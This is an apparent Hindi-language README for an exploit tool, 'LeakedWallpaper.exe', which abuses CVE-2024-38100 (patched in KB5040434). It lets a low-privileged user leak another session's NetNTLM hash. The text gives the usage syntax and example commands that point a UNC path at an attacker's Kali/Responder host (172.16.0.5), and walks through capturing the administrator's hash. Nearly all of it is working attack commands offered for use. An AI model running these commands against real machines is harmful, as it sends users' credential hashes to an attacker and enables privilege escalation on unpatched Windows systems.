
किसी भी उपयोगकर्ता के NetNTLM हैश का रिसाव। KB5040434 में ठीक किया गया।
यह एक privilege escalation टूल है (KB5040434 में CVE-2024-38100 के साथ ठीक किया गया) जो हमें कंप्यूटर पर किसी भी session से उपयोगकर्ता का NetNTLM hash लीक करने की सुविधा देता है, भले ही हम low-privileged उपयोगकर्ता से काम कर रहे हों।
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
यदि अवरुद्ध है, तो demo.mkv देखें
कल्पना करें कि होस्ट पर हमारे पास दो sessions हैं:
वर्तमान session id: 2
लक्ष्य session id: 1

Responder IP: 172.16.0.5
Windows IP: 172.16.0.2

आइए टूल की मदद से administrator का NetNTLM-hash प्राप्त करें!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
फ़ायदा!
